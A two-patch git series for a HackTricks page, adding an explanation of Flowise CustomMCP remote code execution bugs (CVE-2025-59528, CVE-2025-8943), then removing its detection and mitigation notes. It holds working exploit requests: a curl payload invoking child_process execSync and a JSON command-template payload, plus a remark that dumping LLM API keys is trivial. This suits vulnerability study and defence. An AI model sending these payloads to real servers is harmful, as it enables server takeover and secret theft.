From 5580bef09af042f4852f1f8059ae2623e98d9f0a Mon Sep 17 00:00:00 2001
From: HackTricks News Bot <bot@hacktricks.xyz>
Date: Sat, 29 Nov 2025 01:29:31 +0000
Subject: [PATCH 1/2] Add content from: Metasploit Wrap-Up 11/28/2025

---
 src/AI/AI-MCP-Servers.md | 57 +++++++++++++++++++++++++++++++++++++++-
 1 file changed, 56 insertions(+), 1 deletion(-)

diff --git a/src/AI/AI-MCP-Servers.md b/src/AI/AI-MCP-Servers.md
index baec4ba21f8..b7941b6921b 100644
--- a/src/AI/AI-MCP-Servers.md
+++ b/src/AI/AI-MCP-Servers.md
@@ -159,8 +159,63 @@ See also – operational abuse and detection of local AI CLI/MCP clients:
 ../generic-methodologies-and-resources/phishing-methodology/ai-agent-abuse-local-ai-cli-tools-and-mcp.md
 {{#endref}}
 
+### Flowise MCP Workflow RCE (CVE-2025-59528 & CVE-2025-8943)
+
+Flowise embeds MCP tooling inside its low-code LLM orchestrator, but its **CustomMCP** node trusts user-supplied JavaScript/command definitions that are later executed on the Flowise server. Two separate code paths trigger remote command execution:
+
+- `mcpServerConfig` strings are parsed by `convertToValidJSONString()` using `Function('return ' + input)()` with no sandboxing, so any `process.mainModule.require('child_process')` payload executes immediately (CVE-2025-59528 / GHSA-3gcm-f6qx-ff7p). The vulnerable parser is reachable via the unauthenticated (in default installs) endpoint `/api/v1/node-load-method/customMCP`.
+- Even when JSON is supplied instead of a string, Flowise simply forwards the attacker-controlled `command`/`args` into the helper that launches local MCP binaries. Without RBAC or default credentials, the server happily runs arbitrary binaries (CVE-2025-8943 / GHSA-2vv2-3x8x-4gv7).
+
+Metasploit now ships two HTTP exploit modules (`multi/http/flowise_custommcp_rce` and `multi/http/flowise_js_rce`) that automate both paths, optionally authenticating with Flowise API credentials before staging payloads for LLM infrastructure takeover.
+
+Typical exploitation is a single HTTP request. The JavaScript injection vector can be demonstrated with the same cURL payload Rapid7 weaponised:
+
+```bash
+curl -X POST http://flowise.local:3000/api/v1/node-load-method/customMCP \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer <API_TOKEN>" \
+  -d '{
+    "loadMethod": "listActions",
+    "inputs": {
+      "mcpServerConfig": "({trigger:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"sh -c \\\"id>/tmp/pwn\\\"\");return 1;})()})"
+    }
+  }'
+```
+
+Because the payload is executed inside Node.js, functions such as `process.env`, `require('fs')`, or `globalThis.fetch` are instantly available, so it is trivial to dump stored LLM API keys or pivot deeper into the internal network.
+
+The command-template variant exercised by JFrog (CVE-2025-8943) does not even need to abuse JavaScript. Any unauthenticated user can force Flowise to spawn an OS command:
+
+```json
+{
+  "inputs": {
+    "mcpServerConfig": {
+      "command": "touch",
+      "args": ["/tmp/yofitofi"]
+    }
+  },
+  "loadMethod": "listActions"
+}
+```
+
+#### Detection ideas
+
+- Web server or Flowise logs containing requests to `/api/v1/node-load-method/customMCP` with unexpected `loadMethod` values, or payloads that reference `process.mainModule`, `child_process`, `fs`, etc.
+- Process creation telemetry from the Flowise host for binaries launched under the Flowise service account (e.g., sudden `bash`, `powershell`, `curl`, `nc`, `python`).
+- File integrity monitoring around `/tmp`, project directories, or `/home/flowise/.flowise` for artefacts created immediately after Flowise receives `customMCP` requests.
+
+#### Mitigations
+
+- Upgrade to **Flowise 3.0.6+** where `convertToValidJSONString` and the custom MCP loader were hardened; earlier versions (≤3.0.5) are trivially exploitable.
+- Set `FLOWISE_USERNAME`/`FLOWISE_PASSWORD`, disable anonymous API access, and restrict `/api/v1/node-load-method/*` to trusted admin subnets via reverse proxies.
+- Remove Custom MCP capability if not strictly required (`DISABLE_FLOWISE_CUSTOM_MCP=1`) or wrap it with an allow-list proxy so only vetted executables can be launched.
+- Monitor and rotate any secrets stored inside Flowise (LLM provider API keys, database passwords) after an incident because the RCE primitives grant full filesystem and network access.
+
 ## References
 - [CVE-2025-54136 – MCPoison Cursor IDE persistent RCE](https://research.checkpoint.com/2025/cursor-vulnerability-mcpoison/)
+- [Metasploit Wrap-Up 11/28/2025 – new Flowise custom MCP & JS injection exploits](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-11-28-2025)
+- [GHSA-3gcm-f6qx-ff7p / CVE-2025-59528 – Flowise CustomMCP JavaScript code injection](https://github.com/advisories/GHSA-3gcm-f6qx-ff7p)
+- [GHSA-2vv2-3x8x-4gv7 / CVE-2025-8943 – Flowise custom MCP command execution](https://github.com/advisories/GHSA-2vv2-3x8x-4gv7)
+- [JFrog – Flowise OS command remote code execution (JFSA-2025-001380578)](https://research.jfrog.com/vulnerabilities/flowise-os-command-remote-code-execution-jfsa-2025-001380578)
 
 {{#include ../banners/hacktricks-training.md}}
-

From 66420032b847769baeee30e12bb51037a5347438 Mon Sep 17 00:00:00 2001
From: SirBroccoli <carlospolop@gmail.com>
Date: Sun, 30 Nov 2025 17:58:46 +0100
Subject: [PATCH 2/2] Update AI-MCP-Servers.md

---
 src/AI/AI-MCP-Servers.md | 13 -------------
 1 file changed, 13 deletions(-)

diff --git a/src/AI/AI-MCP-Servers.md b/src/AI/AI-MCP-Servers.md
index b7941b6921b..6dcd0b9eb6f 100644
--- a/src/AI/AI-MCP-Servers.md
+++ b/src/AI/AI-MCP-Servers.md
@@ -198,19 +198,6 @@ The command-template variant exercised by JFrog (CVE-2025-8943) does not even ne
 }
 ```
 
-#### Detection ideas
-
-- Web server or Flowise logs containing requests to `/api/v1/node-load-method/customMCP` with unexpected `loadMethod` values, or payloads that reference `process.mainModule`, `child_process`, `fs`, etc.
-- Process creation telemetry from the Flowise host for binaries launched under the Flowise service account (e.g., sudden `bash`, `powershell`, `curl`, `nc`, `python`).
-- File integrity monitoring around `/tmp`, project directories, or `/home/flowise/.flowise` for artefacts created immediately after Flowise receives `customMCP` requests.
-
-#### Mitigations
-
-- Upgrade to **Flowise 3.0.6+** where `convertToValidJSONString` and the custom MCP loader were hardened; earlier versions (≤3.0.5) are trivially exploitable.
-- Set `FLOWISE_USERNAME`/`FLOWISE_PASSWORD`, disable anonymous API access, and restrict `/api/v1/node-load-method/*` to trusted admin subnets via reverse proxies.
-- Remove Custom MCP capability if not strictly required (`DISABLE_FLOWISE_CUSTOM_MCP=1`) or wrap it with an allow-list proxy so only vetted executables can be launched.
-- Monitor and rotate any secrets stored inside Flowise (LLM provider API keys, database passwords) after an incident because the RCE primitives grant full filesystem and network access.
-
 ## References
 - [CVE-2025-54136 – MCPoison Cursor IDE persistent RCE](https://research.checkpoint.com/2025/cursor-vulnerability-mcpoison/)
 - [Metasploit Wrap-Up 11/28/2025 – new Flowise custom MCP & JS injection exploits](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-11-28-2025)